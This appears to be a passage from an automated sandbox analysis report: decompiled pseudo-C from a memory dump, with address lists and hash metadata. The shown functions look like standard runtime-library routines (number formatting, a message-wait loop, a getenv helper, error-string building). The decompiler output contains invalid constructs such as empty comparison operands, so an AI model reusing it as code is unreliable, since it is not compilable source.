                                                                                                    								_t214 = _v16 + 1;
                                                                                                    								_v16 = _t214;
                                                                                                    								_t143 =  *((intOrPtr*)(_a8 + _t214));
                                                                                                    								__eflags = _t143;
                                                                                                    								if(_t143 != 0) {
                                                                                                    									continue;
                                                                                                    								}
                                                                                                    								goto L75;
                                                                                                    							}
                                                                                                    						}
                                                                                                    						L75:
                                                                                                    						__eflags = _a16;
                                                                                                    						if(_a16 < 0) {
                                                                                                    							while(1) {
                                                                                                    								__eflags = _t214 - _a20;
                                                                                                    								if(_t214 >= _a20) {
                                                                                                    									goto L78;
                                                                                                    								}
                                                                                                    								_t143 = E00456F70(_t250, _t221, _t182, _t233, 0x20);
                                                                                                    								_t253 = _t253 + 0x14;
                                                                                                    								_t214 = _v16 + 1;
                                                                                                    								_t124 =  &_a16;
                                                                                                    								 *_t124 = _a16 + 1;
                                                                                                    								__eflags =  *_t124;
                                                                                                    								_v16 = _t214;
                                                                                                    								if( *_t124 < 0) {
                                                                                                    									continue;
                                                                                                    								}
                                                                                                    								goto L78;
                                                                                                    							}
                                                                                                    						}
                                                                                                    						L78:
                                                                                                    						return _t143;
                                                                                                    					} else {
                                                                                                    						goto L18;
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					_t220 = 0x19;
                                                                                                    					_a16 = 0x19;
                                                                                                    					L18:
                                                                                                    					_t184 = _a100;
                                                                                                    					_t217 = _t232;
                                                                                                    					 *((char*)(_t253 + _t220 + 0x30)) = 0;
                                                                                                    					_t208 = _t184 - _t220;
                                                                                                    					_t235 = _t217 + 1;
                                                                                                    					do {
                                                                                                    						_t154 =  *_t217;
                                                                                                    						_t217 = _t217 + 1;
                                                                                                    					} while (_t154 != 0);
                                                                                                    					_t218 = _t217 - _t235;
                                                                                                    					_t156 =  >=  ? _t184 : _t220;
                                                                                                    					_t237 = _a96 - ( >=  ? _t184 : _t220);
                                                                                                    					_t268 = _a12;
                                                                                                    					_t238 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0);
                                                                                                    					_t209 =  <  ? 0 : _t208;
                                                                                                    					_t239 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
                                                                                                    					_a24 = _t209;
                                                                                                    					_t240 =  <  ? 0 : _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
                                                                                                    					_t160 = _a104;
                                                                                                    					_a96 = _t240;
                                                                                                    					if((_t160 & 0x00000010) != 0) {
                                                                                                    						_t246 =  >=  ? _t209 : _t240;
                                                                                                    						_a24 =  >=  ? _t209 : _t240;
                                                                                                    						_t240 = 0;
                                                                                                    						_a96 = 0;
                                                                                                    					}
                                                                                                    					if((_t160 & 0x00000001) != 0) {
                                                                                                    						_t240 =  ~_t240;
                                                                                                    						_a96 = _t240;
                                                                                                    					}
                                                                                                    					_t64 =  &_a28; // 0x456c55
                                                                                                    					_t185 =  *_t64;
                                                                                                    					if(_t240 > 0) {
                                                                                                    						_t226 = _a8;
                                                                                                    						do {
                                                                                                    							E00456F70(_t249, _t185, _t226, _v0, 0x20);
                                                                                                    							_t240 = _t240 - 1;
                                                                                                    							_t253 = _t253 + 0x14;
                                                                                                    						} while (_t240 > 0);
                                                                                                    						_t220 = _a16;
                                                                                                    						_a96 = _t240;
                                                                                                    					}
                                                                                                    					_t161 = _a12;
                                                                                                    					if(_a12 != 0) {
                                                                                                    						E00456F70(_t249, _t185, _a8, _v0, _t161);
                                                                                                    						_t253 = _t253 + 0x14;
                                                                                                    					}
                                                                                                    					_t163 =  *_a4;
                                                                                                    					if( *_a4 != 0) {
                                                                                                    						_t245 = _a8;
                                                                                                    						_t225 = _v0;
                                                                                                    						do {
                                                                                                    							E00456F70(_t249, _t185, _t245, _t225, _t163);
                                                                                                    							_t253 = _t253 + 0x14;
                                                                                                    							_t174 = _a4 + 1;
                                                                                                    							_a4 = _t174;
                                                                                                    							_t163 =  *_t174;
                                                                                                    						} while ( *_t174 != 0);
                                                                                                    						_t240 = _a96;
                                                                                                    						_t220 = _a16;
                                                                                                    					}
                                                                                                    					if(_a24 > 0) {
                                                                                                    						_t244 = _a8;
                                                                                                    						_t224 = _v0;
                                                                                                    						do {
                                                                                                    							E00456F70(_t249, _t185, _t244, _t224, 0x30);
                                                                                                    							_t253 = _t253 + 0x14;
                                                                                                    							_t170 = _a24 - 1;
                                                                                                    							_a24 = _t170;
                                                                                                    						} while (_t170 > 0);
                                                                                                    						_t240 = _a96;
                                                                                                    						_t220 = _a16;
                                                                                                    					}
                                                                                                    					if(_t220 > 0) {
                                                                                                    						_t243 = _a8;
                                                                                                    						do {
                                                                                                    							_t166 =  *((char*)(_t253 + _t220 + 0x2f));
                                                                                                    							_t220 = _t220 - 1;
                                                                                                    							E00456F70(_t249, _t185, _t243, _v0, _t166);
                                                                                                    							_t253 = _t253 + 0x14;
                                                                                                    						} while (_t220 > 0);
                                                                                                    						_t240 = _a96;
                                                                                                    					}
                                                                                                    					if(_t240 < 0) {
                                                                                                    						_t242 =  ~_t240;
                                                                                                    						do {
                                                                                                    							E00456F70(_t249, _t185, _a8, _v0, 0x20);
                                                                                                    							_t253 = _t253 + 0x14;
                                                                                                    							_t242 = _t242 - 1;
                                                                                                    						} while (_t242 != 0);
                                                                                                    					}
                                                                                                    					_pop(_t223);
                                                                                                    					_pop(_t241);
                                                                                                    					_pop(_t186);
                                                                                                    					return E0042A77E(_t186, _a60 ^ _t253, _t218, _t223, _t241);
                                                                                                    				}
                                                                                                    			}
































































                                                                                                    0x004573f5
                                                                                                    0x004573fa
                                                                                                    0x00457401
                                                                                                    0x0045740b
                                                                                                    0x00457410
                                                                                                    0x00457415
                                                                                                    0x00457419
                                                                                                    0x00457422
                                                                                                    0x00457430
                                                                                                    0x00457434
                                                                                                    0x00457438
                                                                                                    0x0045743e
                                                                                                    0x00457442
                                                                                                    0x00457445
                                                                                                    0x00457449
                                                                                                    0x0045744d
                                                                                                    0x00457454
                                                                                                    0x00457456
                                                                                                    0x00457458
                                                                                                    0x00457470
                                                                                                    0x00457473
                                                                                                    0x0045747f
                                                                                                    0x00457482
                                                                                                    0x0045748a
                                                                                                    0x0045748f
                                                                                                    0x00457475
                                                                                                    0x00457475
                                                                                                    0x00457475
                                                                                                    0x00457460
                                                                                                    0x00457460
                                                                                                    0x00457462
                                                                                                    0x0045746a
                                                                                                    0x0045746c
                                                                                                    0x0045746c
                                                                                                    0x00457458
                                                                                                    0x00457493
                                                                                                    0x0045749a
                                                                                                    0x0045749f
                                                                                                    0x004574ac
                                                                                                    0x004574b6
                                                                                                    0x004574b9
                                                                                                    0x004574bd
                                                                                                    0x004574a1
                                                                                                    0x004574a6
                                                                                                    0x004574a6
                                                                                                    0x0045749f
                                                                                                    0x004574c4
                                                                                                    0x004574d3
                                                                                                    0x004574db
                                                                                                    0x004574dd
                                                                                                    0x004574e2
                                                                                                    0x004574e4
                                                                                                    0x004574e9
                                                                                                    0x004574ee
                                                                                                    0x004574f2
                                                                                                    0x004574f7
                                                                                                    0x004574fd
                                                                                                    0x004574fe
                                                                                                    0x00457500
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00457502
                                                                                                    0x00457509
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00457509
                                                                                                    0x0045750b
                                                                                                    0x0045750f
                                                                                                    0x00457516
                                                                                                    0x00457523
                                                                                                    0x0045769f
                                                                                                    0x004576a4
                                                                                                    0x004576a5
                                                                                                    0x004576a6
                                                                                                    0x004576a7
                                                                                                    0x004576a8
                                                                                                    0x004576a9
                                                                                                    0x004576aa
                                                                                                    0x004576ab
                                                                                                    0x004576ac
                                                                                                    0x004576ad
                                                                                                    0x004576ae
                                                                                                    0x004576af
                                                                                                    0x004576b5
                                                                                                    0x004576ba
                                                                                                    0x004576be
                                                                                                    0x004576c0
                                                                                                    0x004576c2
                                                                                                    0x004576ca
                                                                                                    0x004576cd
                                                                                                    0x004576cf
                                                                                                    0x004576d3
                                                                                                    0x004576d5
                                                                                                    0x004576d7
                                                                                                    0x004576d7
                                                                                                    0x004576d8
                                                                                                    0x004576d8
                                                                                                    0x004576d7
                                                                                                    0x004576e5
                                                                                                    0x004576e8
                                                                                                    0x004576ed
                                                                                                    0x004576f1
                                                                                                    0x004576f3
                                                                                                    0x004576f5
                                                                                                    0x004576f5
                                                                                                    0x004576f9
                                                                                                    0x004576fa
                                                                                                    0x004576fe
                                                                                                    0x004576ff
                                                                                                    0x00457703
                                                                                                    0x00457704
                                                                                                    0x00457708
                                                                                                    0x00457709
                                                                                                    0x0045770d
                                                                                                    0x0045770f
                                                                                                    0x00457715
                                                                                                    0x00457715
                                                                                                    0x00457719
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0045771f
                                                                                                    0x00457721
                                                                                                    0x00457725
                                                                                                    0x00457727
                                                                                                    0x00457730
                                                                                                    0x00457730
                                                                                                    0x00457733
                                                                                                    0x00457772
                                                                                                    0x00457772
                                                                                                    0x00457786
                                                                                                    0x0045778b
                                                                                                    0x0045778e
                                                                                                    0x00457735
                                                                                                    0x00457735
                                                                                                    0x00457738
                                                                                                    0x0045773a
                                                                                                    0x0045773a
                                                                                                    0x00457751
                                                                                                    0x00457753
                                                                                                    0x00457756
                                                                                                    0x00457758
                                                                                                    0x0045775a
                                                                                                    0x00457761
                                                                                                    0x00457766
                                                                                                    0x00457766
                                                                                                    0x00457769
                                                                                                    0x00457769
                                                                                                    0x00457792
                                                                                                    0x00457792
                                                                                                    0x00457796
                                                                                                    0x00457796
                                                                                                    0x00457727
                                                                                                    0x0045779a
                                                                                                    0x0045779c
                                                                                                    0x0045779e
                                                                                                    0x004577a0
                                                                                                    0x004577a3
                                                                                                    0x004577a5
                                                                                                    0x004577af
                                                                                                    0x004577a7
                                                                                                    0x004577a7
                                                                                                    0x004577a7
                                                                                                    0x004577b3
                                                                                                    0x004577b3
                                                                                                    0x004577b3
                                                                                                    0x004577b9
                                                                                                    0x004577ba
                                                                                                    0x004577bb
                                                                                                    0x004577bf
                                                                                                    0x004577c3
                                                                                                    0x004577c5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004577c5
                                                                                                    0x00457715
                                                                                                    0x004577cb
                                                                                                    0x004577cb
                                                                                                    0x004577cf
                                                                                                    0x004577d1
                                                                                                    0x004577d3
                                                                                                    0x004577d7
                                                                                                    0x004577e0
                                                                                                    0x004577e0
                                                                                                    0x004577e4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004577ee
                                                                                                    0x004577f7
                                                                                                    0x004577fe
                                                                                                    0x004577ff
                                                                                                    0x00457803
                                                                                                    0x00457806
                                                                                                    0x00457808
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00457808
                                                                                                    0x004577e0
                                                                                                    0x0045780a
                                                                                                    0x0045780a
                                                                                                    0x0045780f
                                                                                                    0x00457811
                                                                                                    0x00457811
                                                                                                    0x00457815
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0045781d
                                                                                                    0x00457826
                                                                                                    0x00457829
                                                                                                    0x0045782a
                                                                                                    0x0045782a
                                                                                                    0x0045782a
                                                                                                    0x0045782e
                                                                                                    0x00457832
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00457832
                                                                                                    0x00457811
                                                                                                    0x00457834
                                                                                                    0x00457839
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00457518
                                                                                                    0x00457518
                                                                                                    0x0045751d
                                                                                                    0x00457529
                                                                                                    0x00457529
                                                                                                    0x0045752d
                                                                                                    0x00457531
                                                                                                    0x00457536
                                                                                                    0x00457538
                                                                                                    0x00457540
                                                                                                    0x00457540
                                                                                                    0x00457542
                                                                                                    0x00457543
                                                                                                    0x00457547
                                                                                                    0x00457551
                                                                                                    0x00457554
                                                                                                    0x00457558
                                                                                                    0x0045755f
                                                                                                    0x00457565
                                                                                                    0x00457568
                                                                                                    0x0045756a
                                                                                                    0x0045756e
                                                                                                    0x00457571
                                                                                                    0x00457575
                                                                                                    0x0045757b
                                                                                                    0x0045757f
                                                                                                    0x00457582
                                                                                                    0x00457586
                                                                                                    0x00457588
                                                                                                    0x00457588
                                                                                                    0x0045758e
                                                                                                    0x00457590
                                                                                                    0x00457592
                                                                                                    0x00457592
                                                                                                    0x00457596
                                                                                                    0x00457596
                                                                                                    0x0045759c
                                                                                                    0x0045759e
                                                                                                    0x004575a2
                                                                                                    0x004575ab
                                                                                                    0x004575b0
                                                                                                    0x004575b1
                                                                                                    0x004575b4
                                                                                                    0x004575b8
                                                                                                    0x004575bc
                                                                                                    0x004575bc
                                                                                                    0x004575c0
                                                                                                    0x004575c6
                                                                                                    0x004575d3
                                                                                                    0x004575d8
                                                                                                    0x004575d8
                                                                                                    0x004575df
                                                                                                    0x004575e3
                                                                                                    0x004575e5
                                                                                                    0x004575e9
                                                                                                    0x004575f0
                                                                                                    0x004575f8
                                                                                                    0x00457601
                                                                                                    0x00457604
                                                                                                    0x00457605
                                                                                                    0x00457609
                                                                                                    0x0045760b
                                                                                                    0x0045760f
                                                                                                    0x00457613
                                                                                                    0x00457613
                                                                                                    0x0045761c
                                                                                                    0x0045761e
                                                                                                    0x00457622
                                                                                                    0x00457626
                                                                                                    0x0045762c
                                                                                                    0x00457635
                                                                                                    0x00457638
                                                                                                    0x00457639
                                                                                                    0x0045763d
                                                                                                    0x00457641
                                                                                                    0x00457645
                                                                                                    0x00457645
                                                                                                    0x0045764b
                                                                                                    0x0045764d
                                                                                                    0x00457651
                                                                                                    0x00457651
                                                                                                    0x00457656
                                                                                                    0x0045765f
                                                                                                    0x00457664
                                                                                                    0x00457667
                                                                                                    0x0045766b
                                                                                                    0x0045766b
                                                                                                    0x00457671
                                                                                                    0x00457673
                                                                                                    0x00457675
                                                                                                    0x00457681
                                                                                                    0x00457686
                                                                                                    0x00457689
                                                                                                    0x00457689
                                                                                                    0x00457675
                                                                                                    0x00457690
                                                                                                    0x00457691
                                                                                                    0x00457693
                                                                                                    0x0045769e
                                                                                                    0x0045769e

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm
                                                                                                    • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                    • API String ID: 1302938615-3129329331
                                                                                                    • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                    • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                    • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                    • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00411B10() {
                                                                                                    				intOrPtr _v8;
                                                                                                    				struct tagMSG _v36;
                                                                                                    				long _t9;
                                                                                                    				long _t11;
                                                                                                    				intOrPtr _t19;
                                                                                                    
                                                                                                    				_t1 = timeGetTime() + 0x1388; // 0x1388
                                                                                                    				_t19 = _t1;
                                                                                                    				_v8 = _t19;
                                                                                                    				_t9 = timeGetTime();
                                                                                                    				if(_t19 > _t9) {
                                                                                                    					do {
                                                                                                    						_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
                                                                                                    						if(_t11 == 0) {
                                                                                                    							goto L5;
                                                                                                    						}
                                                                                                    						while(_v36.message != 0x12) {
                                                                                                    							DispatchMessageW( &_v36);
                                                                                                    							_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
                                                                                                    							if(_t11 != 0) {
                                                                                                    								continue;
                                                                                                    							}
                                                                                                    							goto L5;
                                                                                                    						}
                                                                                                    						break;
                                                                                                    						L5:
                                                                                                    						Sleep(0x64);
                                                                                                    						_t11 = timeGetTime();
                                                                                                    					} while (_v8 > _t11);
                                                                                                    					return _t11;
                                                                                                    				}
                                                                                                    				return _t9;
                                                                                                    			}








                                                                                                    0x00411b20
                                                                                                    0x00411b20
                                                                                                    0x00411b26
                                                                                                    0x00411b29
                                                                                                    0x00411b2d
                                                                                                    0x00411b40
                                                                                                    0x00411b4c
                                                                                                    0x00411b50
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00411b52
                                                                                                    0x00411b5c
                                                                                                    0x00411b6a
                                                                                                    0x00411b6e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00411b6e
                                                                                                    0x00000000
                                                                                                    0x00411b70
                                                                                                    0x00411b72
                                                                                                    0x00411b78
                                                                                                    0x00411b7a
                                                                                                    0x00000000
                                                                                                    0x00411b7f
                                                                                                    0x00411b85

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3697694649-0
                                                                                                    • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                    • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                                    • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                    • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 87%
                                                                                                    			E004416EB(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                    				signed int _v8;
                                                                                                    				signed int _v32;
                                                                                                    				signed int _t16;
                                                                                                    				intOrPtr _t17;
                                                                                                    				signed int _t19;
                                                                                                    				signed int _t20;
                                                                                                    				signed int _t30;
                                                                                                    				intOrPtr* _t35;
                                                                                                    				intOrPtr* _t37;
                                                                                                    				signed int* _t40;
                                                                                                    				void* _t48;
                                                                                                    				signed int _t50;
                                                                                                    				signed int _t54;
                                                                                                    				signed int _t57;
                                                                                                    				intOrPtr _t58;
                                                                                                    				intOrPtr _t59;
                                                                                                    
                                                                                                    				_t48 = __edx;
                                                                                                    				_t40 = _a4;
                                                                                                    				_t65 = _t40;
                                                                                                    				if(_t40 != 0) {
                                                                                                    					 *_t40 =  *_t40 & 0x00000000;
                                                                                                    					_t54 = _a12;
                                                                                                    					_t50 = _a8;
                                                                                                    					__eflags = _t50;
                                                                                                    					if(_t50 == 0) {
                                                                                                    						__eflags = _t54;
                                                                                                    						if(__eflags == 0) {
                                                                                                    							goto L4;
                                                                                                    						} else {
                                                                                                    							goto L13;
                                                                                                    						}
                                                                                                    					} else {
                                                                                                    						__eflags = _t54;
                                                                                                    						if(__eflags == 0) {
                                                                                                    							L13:
                                                                                                    							_t35 = E00425208(__eflags);
                                                                                                    							_t58 = 0x16;
                                                                                                    							 *_t35 = _t58;
                                                                                                    							E004242D2();
                                                                                                    							_t17 = _t58;
                                                                                                    							goto L10;
                                                                                                    						} else {
                                                                                                    							L4:
                                                                                                    							__eflags = _t50;
                                                                                                    							if(_t50 != 0) {
                                                                                                    								 *_t50 = 0;
                                                                                                    							}
                                                                                                    							_t16 = E00441667(_a16);
                                                                                                    							_a4 = _t16;
                                                                                                    							__eflags = _t16;
                                                                                                    							if(_t16 == 0) {
                                                                                                    								L15:
                                                                                                    								_t17 = 0;
                                                                                                    								goto L10;
                                                                                                    							} else {
                                                                                                    								_t19 = E0042C160(_t16) + 1;
                                                                                                    								 *_t40 = _t19;
                                                                                                    								__eflags = _t54;
                                                                                                    								if(_t54 == 0) {
                                                                                                    									goto L15;
                                                                                                    								} else {
                                                                                                    									__eflags = _t19 - _t54;
                                                                                                    									if(_t19 <= _t54) {
                                                                                                    										_t20 = E0042C0FD(_t50, _t54, _a4);
                                                                                                    										__eflags = _t20;
                                                                                                    										if(_t20 != 0) {
                                                                                                    											_push(0);
                                                                                                    											_push(0);
                                                                                                    											_push(0);
                                                                                                    											_push(0);
                                                                                                    											_push(0);
                                                                                                    											E004242FD(_t40, _t48);
                                                                                                    											asm("int3");
                                                                                                    											_push(0xc);
                                                                                                    											_push(0x508078);
                                                                                                    											E00428520(_t40, _t50, _t54);
                                                                                                    											_v32 = _v32 & 0x00000000;
                                                                                                    											_t56 = _a4;
                                                                                                    											__eflags = _a4;
                                                                                                    											__eflags = 0 | _a4 != 0x00000000;
                                                                                                    											if(__eflags != 0) {
                                                                                                    												__eflags = E00448FF4(_t56, 0x7fff) - 0x7fff;
                                                                                                    												asm("sbb eax, eax");
                                                                                                    												if(__eflags == 0) {
                                                                                                    													goto L17;
                                                                                                    												} else {
                                                                                                    													E00428AF7(7);
                                                                                                    													_t12 =  &_v8;
                                                                                                    													 *_t12 = _v8 & 0x00000000;
                                                                                                    													__eflags =  *_t12;
                                                                                                    													_t57 = E00441667(_t56);
                                                                                                    													_v32 = _t57;
                                                                                                    													_v8 = 0xfffffffe;
                                                                                                    													E004417FD();
                                                                                                    													_t30 = _t57;
                                                                                                    												}
                                                                                                    											} else {
                                                                                                    												L17:
                                                                                                    												 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
                                                                                                    												E004242D2();
                                                                                                    												_t30 = 0;
                                                                                                    											}
                                                                                                    											return E00428565(_t30);
                                                                                                    										} else {
                                                                                                    											goto L15;
                                                                                                    										}
                                                                                                    									} else {
                                                                                                    										_t17 = 0x22;
                                                                                                    										L10:
                                                                                                    										goto L11;
                                                                                                    									}
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					_t37 = E00425208(_t65);
                                                                                                    					_t59 = 0x16;
                                                                                                    					 *_t37 = _t59;
                                                                                                    					E004242D2();
                                                                                                    					_t17 = _t59;
                                                                                                    					L11:
                                                                                                    					return _t17;
                                                                                                    				}
                                                                                                    			}



















                                                                                                    0x004416eb
                                                                                                    0x004416ef
                                                                                                    0x004416f3
                                                                                                    0x004416f5
                                                                                                    0x0044170a
                                                                                                    0x0044170d
                                                                                                    0x00441711
                                                                                                    0x00441714
                                                                                                    0x00441716
                                                                                                    0x0044174d
                                                                                                    0x0044174f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00441718
                                                                                                    0x00441718
                                                                                                    0x0044171a
                                                                                                    0x00441751
                                                                                                    0x00441751
                                                                                                    0x00441758
                                                                                                    0x00441759
                                                                                                    0x0044175b
                                                                                                    0x00441760
                                                                                                    0x00000000
                                                                                                    0x0044171c
                                                                                                    0x0044171c
                                                                                                    0x0044171c
                                                                                                    0x0044171e
                                                                                                    0x00441720
                                                                                                    0x00441720
                                                                                                    0x00441726
                                                                                                    0x0044172b
                                                                                                    0x0044172f
                                                                                                    0x00441731
                                                                                                    0x00441775
                                                                                                    0x00441775
                                                                                                    0x00000000
                                                                                                    0x00441733
                                                                                                    0x00441739
                                                                                                    0x0044173a
                                                                                                    0x0044173d
                                                                                                    0x0044173f
                                                                                                    0x00000000
                                                                                                    0x00441741
                                                                                                    0x00441741
                                                                                                    0x00441743
                                                                                                    0x00441769
                                                                                                    0x00441771
                                                                                                    0x00441773
                                                                                                    0x0044177b
                                                                                                    0x0044177c
                                                                                                    0x0044177d
                                                                                                    0x0044177e
                                                                                                    0x0044177f
                                                                                                    0x00441780
                                                                                                    0x00441785
                                                                                                    0x00441786
                                                                                                    0x00441788
                                                                                                    0x0044178d
                                                                                                    0x00441792
                                                                                                    0x00441798
                                                                                                    0x0044179b
                                                                                                    0x004417a0
                                                                                                    0x004417a2
                                                                                                    0x004417c6
                                                                                                    0x004417c8
                                                                                                    0x004417cc
                                                                                                    0x00000000
                                                                                                    0x004417ce
                                                                                                    0x004417d0
                                                                                                    0x004417d6
                                                                                                    0x004417d6
                                                                                                    0x004417d6
                                                                                                    0x004417e1
                                                                                                    0x004417e3
                                                                                                    0x004417e6
                                                                                                    0x004417ed
                                                                                                    0x004417f2
                                                                                                    0x004417f2
                                                                                                    0x004417a4
                                                                                                    0x004417a4
                                                                                                    0x004417a9
                                                                                                    0x004417af
                                                                                                    0x004417b4
                                                                                                    0x004417b4
                                                                                                    0x004417f9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00441745
                                                                                                    0x00441747
                                                                                                    0x00441748
                                                                                                    0x00000000
                                                                                                    0x00441748
                                                                                                    0x00441743
                                                                                                    0x0044173f
                                                                                                    0x00441731
                                                                                                    0x0044171a
                                                                                                    0x004416f7
                                                                                                    0x004416f7
                                                                                                    0x004416fe
                                                                                                    0x004416ff
                                                                                                    0x00441701
                                                                                                    0x00441706
                                                                                                    0x00441749
                                                                                                    0x0044174c
                                                                                                    0x0044174c

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3534693527-0
                                                                                                    • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                    • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                                    • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                    • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 29%
                                                                                                    			E004506A0(void* __ebp, intOrPtr _a4, signed int _a8, intOrPtr _a12, char _a16, char _a80, char _a144, signed int _a208, unsigned int _a216, intOrPtr* _a220, intOrPtr _a224) {
                                                                                                    				intOrPtr _v0;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				signed int _t29;
                                                                                                    				intOrPtr _t35;
                                                                                                    				intOrPtr _t43;
                                                                                                    				char* _t46;
                                                                                                    				intOrPtr _t54;
                                                                                                    				intOrPtr _t55;
                                                                                                    				intOrPtr* _t57;
                                                                                                    				void* _t65;
                                                                                                    				void* _t66;
                                                                                                    				intOrPtr* _t67;
                                                                                                    				unsigned int _t68;
                                                                                                    				void* _t69;
                                                                                                    				signed int _t73;
                                                                                                    				intOrPtr _t74;
                                                                                                    				signed int _t75;
                                                                                                    				void* _t76;
                                                                                                    				signed int _t77;
                                                                                                    
                                                                                                    				E0042F7C0(0xd4);
                                                                                                    				_t29 =  *0x50ad20; // 0x2cb5b44c
                                                                                                    				_a208 = _t29 ^ _t75;
                                                                                                    				_t54 = _a224;
                                                                                                    				_t68 = _a216;
                                                                                                    				_t67 = _a220;
                                                                                                    				_t73 = _t68 >> 0x0000000c & 0x00000fff;
                                                                                                    				_a8 = _t68 & 0x00000fff;
                                                                                                    				_a4 = E00450DF0(_t54, _t65, _t67, _t73, _t68);
                                                                                                    				_v0 = E00450870(_t54, _t67, _t73, _t68);
                                                                                                    				_t35 = E004513B0(_t54, _t65, _t67, _t73, _t68);
                                                                                                    				_t76 = _t75 + 0xc;
                                                                                                    				_a12 = _t35;
                                                                                                    				if(_a4 == 0) {
                                                                                                    					_push(_t68 >> 0x18);
                                                                                                    					_push("lib(%lu)");
                                                                                                    					_push(0x40);
                                                                                                    					_push( &_a144);
                                                                                                    					E004567A0(_t68 >> 0x18);
                                                                                                    					_t76 = _t76 + 0x10;
                                                                                                    				}
                                                                                                    				_t81 = _v0;
                                                                                                    				if(_v0 == 0) {
                                                                                                    					_push(_t73);
                                                                                                    					_push("func(%lu)");
                                                                                                    					_push(0x40);
                                                                                                    					_push( &_a80);
                                                                                                    					E004567A0(_t81);
